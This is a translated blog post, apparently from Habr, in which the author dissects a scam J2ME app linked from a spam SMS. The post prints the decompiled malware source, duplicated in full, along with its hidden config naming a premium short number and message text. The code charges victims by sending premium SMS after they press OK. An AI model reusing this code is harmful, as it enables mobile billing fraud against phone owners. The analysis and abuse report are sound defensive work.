A small study of spam sms
The picture on the right does not quite match the content of the post, just a small example of SMS spam.
So, the story itself: received yesterday sms as follows:
“You have an MMS message tutu.wml.in/lo.jar ”
')
Obviously, this is another divorce and I did not open the link and did something else.
But this morning I wondered what was there, how it worked and what it did.
I downloaded this jar from the computer and unpacked it. Inside was all at a minimum:
- Small picture
- Compiled java class main.class
- Some dubious png-shka, unopened by image viewers.
- Class ResourceUTF8, taken apparently from here .
Decompiling the contents of the main class, I saw the following code:
import java.io.IOException;
import javax.microedition.io.Connector;
import javax.microedition.lcdui.Command;
import javax.microedition.lcdui.CommandListener;
import javax.microedition.lcdui.Display;
import javax.microedition.lcdui.Displayable;
import javax.microedition.lcdui.Form;
import javax.microedition.lcdui.Image;
import javax.microedition.midlet.MIDlet;
import javax.wireless.messaging.MessageConnection;
import javax.wireless.messaging.TextMessage;
import lib.Resources.ResourcesUTF8;
public class main extends MIDlet implements CommandListener {
public static ResourcesUTF8 language;
private boolean isLanguage;
private Form form;
private Image image;
private Display display;
private Command cmd_ok;
private Command cmd_cancel;
public main() {
language = new ResourcesUTF8( "/sample.png" );
this .isLanguage = language.load();
this .cmd_ok = new Command( "\u041e\u043a" , 4, 2);
this .cmd_cancel = new Command( "\u041e\u0442\u043c\u0435\u043d\u0430" , 7, 4);
}
public void startApp() {
this .display = Display.getDisplay( this );
try {
this .image = Image.createImage(language. get ( "picname" ));
} catch (IOException var2) {
System. out .println(var2.getMessage());
}
this .form = new Form(language. get ( "title" ));
this .form.append(language. get ( "textvalue" ));
this .form.addCommand( this .cmd_ok);
this .form.addCommand( this .cmd_cancel);
this .form.setCommandListener( this );
this .display.setCurrent( this .form);
}
public void pauseApp() {
System.gc();
}
public void destroyApp(boolean var1) {
}
public void commandAction(Command var1, Displayable var2) {
if (var1 == this .cmd_ok) {
String var3;
MessageConnection var4;
TextMessage var5;
try {
var3 = "sms://" + language. get ( "numberphone1" );
var4 = (MessageConnection)Connector.open(var3);
var5 = (TextMessage)var4.newMessage( "text" );
var5.setPayloadText(language. get ( "message1" ));
var4.send(var5);
} catch (Exception var8) {
;
}
try {
var3 = "sms://" + language. get ( "numberphone2" );
var4 = (MessageConnection)Connector.open(var3);
var5 = (TextMessage)var4.newMessage( "text" );
var5.setPayloadText(language. get ( "message2" ));
var4.send(var5);
} catch (Exception var7) {
;
}
try {
var3 = "sms://" + language. get ( "numberphone3" );
var4 = (MessageConnection)Connector.open(var3);
var5 = (TextMessage)var4.newMessage( "text" );
var5.setPayloadText(language. get ( "message3" ));
var4.send(var5);
} catch (Exception var6) {
;
}
this .form.delete(0);
this .form.append( this .image);
}
if (var1 == this .cmd_cancel) {
this .notifyDestroyed();
}
}
}
* This source code was highlighted with Source Code Highlighter .import java.io.IOException;
import javax.microedition.io.Connector;
import javax.microedition.lcdui.Command;
import javax.microedition.lcdui.CommandListener;
import javax.microedition.lcdui.Display;
import javax.microedition.lcdui.Displayable;
import javax.microedition.lcdui.Form;
import javax.microedition.lcdui.Image;
import javax.microedition.midlet.MIDlet;
import javax.wireless.messaging.MessageConnection;
import javax.wireless.messaging.TextMessage;
import lib.Resources.ResourcesUTF8;
public class main extends MIDlet implements CommandListener {
public static ResourcesUTF8 language;
private boolean isLanguage;
private Form form;
private Image image;
private Display display;
private Command cmd_ok;
private Command cmd_cancel;
public main() {
language = new ResourcesUTF8( "/sample.png" );
this .isLanguage = language.load();
this .cmd_ok = new Command( "\u041e\u043a" , 4, 2);
this .cmd_cancel = new Command( "\u041e\u0442\u043c\u0435\u043d\u0430" , 7, 4);
}
public void startApp() {
this .display = Display.getDisplay( this );
try {
this .image = Image.createImage(language. get ( "picname" ));
} catch (IOException var2) {
System. out .println(var2.getMessage());
}
this .form = new Form(language. get ( "title" ));
this .form.append(language. get ( "textvalue" ));
this .form.addCommand( this .cmd_ok);
this .form.addCommand( this .cmd_cancel);
this .form.setCommandListener( this );
this .display.setCurrent( this .form);
}
public void pauseApp() {
System.gc();
}
public void destroyApp(boolean var1) {
}
public void commandAction(Command var1, Displayable var2) {
if (var1 == this .cmd_ok) {
String var3;
MessageConnection var4;
TextMessage var5;
try {
var3 = "sms://" + language. get ( "numberphone1" );
var4 = (MessageConnection)Connector.open(var3);
var5 = (TextMessage)var4.newMessage( "text" );
var5.setPayloadText(language. get ( "message1" ));
var4.send(var5);
} catch (Exception var8) {
;
}
try {
var3 = "sms://" + language. get ( "numberphone2" );
var4 = (MessageConnection)Connector.open(var3);
var5 = (TextMessage)var4.newMessage( "text" );
var5.setPayloadText(language. get ( "message2" ));
var4.send(var5);
} catch (Exception var7) {
;
}
try {
var3 = "sms://" + language. get ( "numberphone3" );
var4 = (MessageConnection)Connector.open(var3);
var5 = (TextMessage)var4.newMessage( "text" );
var5.setPayloadText(language. get ( "message3" ));
var4.send(var5);
} catch (Exception var6) {
;
}
this .form.delete(0);
this .form.append( this .image);
}
if (var1 == this .cmd_cancel) {
this .notifyDestroyed();
}
}
}
* This source code was highlighted with Source Code Highlighter .If anyone is interested in decompiling Fernflower online decompiler.
To understand what the code does, you can not even be a programmer. He takes some information from that strange png-shki and sends SMS from the phone.
Here is the contents of the png, if you open it with a notepad:
title=OTKPblTKA
textvalue= ?
picname=/love.JPG
numberphone1= 7132
message1= 199414999922
And here is the number where SMS will be sent and message text. Yes, the outcome is very trivial. And this was to be expected. But all the same, I think that it was not a waste of time. And perhaps to someone from the habr-community, this information will seem interesting.
UPD: wrote a complaint to the support service of the owner of the short number, using this instruction .
Source: https://habr.com/ru/post/113017/
All Articles